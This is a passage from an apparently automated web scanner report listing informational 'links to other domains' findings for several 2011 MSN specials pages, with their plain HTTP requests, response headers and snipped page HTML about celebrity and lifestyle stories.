<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661317&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FEntertainment%2FMost-wanted-celebrity-body-parts.aspx%3Fcp-documentid%3D27205056%26imageindex%3D1&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=most+wanted+celebrity+body+parts&src=IE-SearchBox&FORM=msnhal">Search: Most-wanted celebrity body parts</a>
...[SNIP]...
<div>Many people's New Year's resolutions involve eating better and exercising more. (See these <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=healthy+tips&go=&form=msnhal">healthy tips.</a>) Want to take a different path to a new you? Plastic surgeons say these celebrities may have the body parts and features that you're looking for. But take note: There have been a few <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=celebrity+plastic+surgery+disasters&go=&form=msnhal">plastic surgery mishaps</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm">'Cuckoo's Nest' & remains</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm">Punxsutawney Phil</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm">Ines Sainz...s outfit</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm">Airport weather delays</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

17.184. http://specials.msn.com/A-List/Entertainment/New-Superman-chosen.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Entertainment/New-Superman-chosen.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.msn.com/A-List/Entertainment/New-Superman-chosen.aspx?cp-documentid=27489259

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm
http://www.bing.com/search?q=Brandon+Routh+and+One+Life+to+Live&form=msnpop
http://www.bing.com/search?q=Henry+Cavill+bio&form=msnpop
http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm
http://www.bing.com/search?q=Lois+Lane+and+Superman+and+Henry+Cavill&FORM=msnpop
http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm
http://www.bing.com/search?q=henry+cavill+superman
http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/search?q=George+Reeves+and+Superman&FORM=msnpop
http://www.bing.com/videos/search?q=Superman+and+Christopher+Reeve&form=msnpop
http://www.bing.com/videos/search?q=henry+cavill+and+%22The+Tudors%22&FORM=msnpop
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661300&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FEntertainment%2FNew-Superman-chosen.aspx%3Fcp-documentid%3D27489259&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Entertainment/New-Superman-chosen.aspx?cp-documentid=27489259 HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:40 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=7cf5faebc3bd4c15ae60196930a72107; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=5BE2D0C40A2D4D8EA95F63A42EF8E8B7; domain=.msn.com; expires=Sun, 21-Aug-2011 15:41:40 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661300&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FEntertainment%2FNew-Superman-chosen.aspx%3Fcp-documentid%3D27489259&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=henry+cavill+superman"><strong>
...[SNIP]...
<div>Henry Cavill, an actor who may be best known for his role in ...The Tudors... (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/search?q=henry+cavill+and+%22The+Tudors%22&FORM=msnpop">watch</a>), will be the next Superman. The role, which was played by a ...Gone With the Wind... actor (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/search?q=George+Reeves+and+Superman&FORM=msnpop">see the TV series</a>), often goes to relative unknown... (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Henry+Cavill+bio&form=msnpop">Here...s more</a>
...[SNIP]...
<div>One Superman was seriously injured in a fall from a horse. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/search?q=Superman+and+Christopher+Reeve&form=msnpop">Watch him</a>
...[SNIP]...
<div>An actor primarily known for soap operas also played the mild-mannered reporter/superhero. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Brandon+Routh+and+One+Life+to+Live&form=msnpop">Find out who</a>
...[SNIP]...
<div>Now, who will play Lois Lane? (Here are <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Lois+Lane+and+Superman+and+Henry+Cavill&FORM=msnpop">some suggestions</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm">'Cuckoo's Nest' & remains</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm">Punxsutawney Phil</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm">Ines Sainz...s outfit</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm">Airport weather delays</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

17.185. http://specials.msn.com/A-List/Entertainment/Ozzy-cancels-Reno-show.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Entertainment/Ozzy-cancels-Reno-show.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.msn.com/A-List/Entertainment/Ozzy-cancels-Reno-show.aspx?cp-documentid=27492942

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/images/search?q=ozzy+and+Sharon&FORM=msnpop
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/music/songs/search?q=ozzy+osbourne+and+let+it+die&go=&form=msnpop
http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm
http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm
http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm
http://www.bing.com/search?q=ozzy+osbourne+and+Reno+and+reschedule+and+April&form=msnpop
http://www.bing.com/search?q=ozzy+osbourne+and+justin+bieber+and+Super+Bowl&form=msnpop
http://www.bing.com/search?q=ozzy+osbourne+and+sudden+illness&go=&form=msnpop
http://www.bing.com/search?q=ozzy+osbourne+reno+show&form=msnpop
http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/search?q=ozzy+osbourne+&FORM=msnpop
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661294&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FEntertainment%2FOzzy-cancels-Reno-show.aspx%3Fcp-documentid%3D27492942&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Entertainment/Ozzy-cancels-Reno-show.aspx?cp-documentid=27492942 HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:34 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA53
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=cbc9716d6c744e328b67aaea7608db2d; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=C6F8B58928F64DF3BF7ABEB182EE4702; domain=.msn.com; expires=Sun, 21-Aug-2011 15:41:34 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 22925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661294&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FEntertainment%2FOzzy-cancels-Reno-show.aspx%3Fcp-documentid%3D27492942&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=ozzy+osbourne+reno+show&form=msnpop"><strong>
...[SNIP]...
<div>The heavy metal legend (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/search?q=ozzy+osbourne+&FORM=msnpop">see videos</a>) abruptly canceled his concert in Reno, Nev., on Sunday night. Here...s what <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=ozzy+osbourne+and+sudden+illness&go=&form=msnpop">the promoter of his ...Scream... tour</a> said about it. It...s been rescheduled. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=ozzy+osbourne+and+Reno+and+reschedule+and+April&form=msnpop">Here...s when</a>
...[SNIP]...
<div>He and a teen star (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=ozzy+osbourne+and+justin+bieber+and+Super+Bowl&form=msnpop">here...s who</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/music/songs/search?q=ozzy+osbourne+and+let+it+die&go=&form=msnpop">Listen</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=ozzy+and+Sharon&FORM=msnpop">See</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm">'Cuckoo's Nest' & remains</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm">Punxsutawney Phil</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm">Ines Sainz...s outfit</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm">Airport weather delays</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

17.186. http://specials.msn.com/A-List/Lifestyle/African-American-History.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/African-American-History.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.msn.com/A-List/Lifestyle/African-American-History.aspx?cp-documentid=27490275&imageindex=1

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/events/search?q=Black+History&form=msnhal
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm
http://www.bing.com/search?q=Carter+G.+Woodson&go=&form=msnhal
http://www.bing.com/search?q=Famous+African+Americans&go=&form=msnhal
http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm
http://www.bing.com/search?q=Moments+in+African+American+History&go=&form=msnhal
http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm
http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661287&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FLifestyle%2FAfrican-American-History.aspx%3Fcp-documentid%3D27490275%26imageindex%3D1&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Lifestyle/African-American-History.aspx?cp-documentid=27490275&imageindex=1 HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:27 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=e58ccc0ab495450dac689ee1fd175864; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=E1914562853945E1A80A440790667525; domain=.msn.com; expires=Sun, 21-Aug-2011 15:41:27 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 40782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661287&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FLifestyle%2FAfrican-American-History.aspx%3Fcp-documentid%3D27490275%26imageindex%3D1&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<h3><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Moments+in+African+American+History&go=&form=msnhal">Search: Groundbreaking moments in black history</a>
...[SNIP]...
<div>Many <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Famous+African+Americans&go=&form=msnhal">African-Americans</a> have made significant contributions to American history. In honor of Black History Month (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Carter+G.+Woodson&go=&form=msnhal">who started it</a>?), get the facts about some pioneers and see if you can figure out those who made their mark. Want a more hands-on history lesson? <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/events/search?q=Black+History&form=msnhal">Check out these black history events across America</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm">'Cuckoo's Nest' & remains</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm">Punxsutawney Phil</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm">Ines Sainz...s outfit</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm">Airport weather delays</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

17.187. http://specials.msn.com/A-List/Lifestyle/Best-home-remedies.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/Best-home-remedies.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.msn.com/A-List/Lifestyle/Best-home-remedies.aspx?cp-documentid=27020257&imageindex=1

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
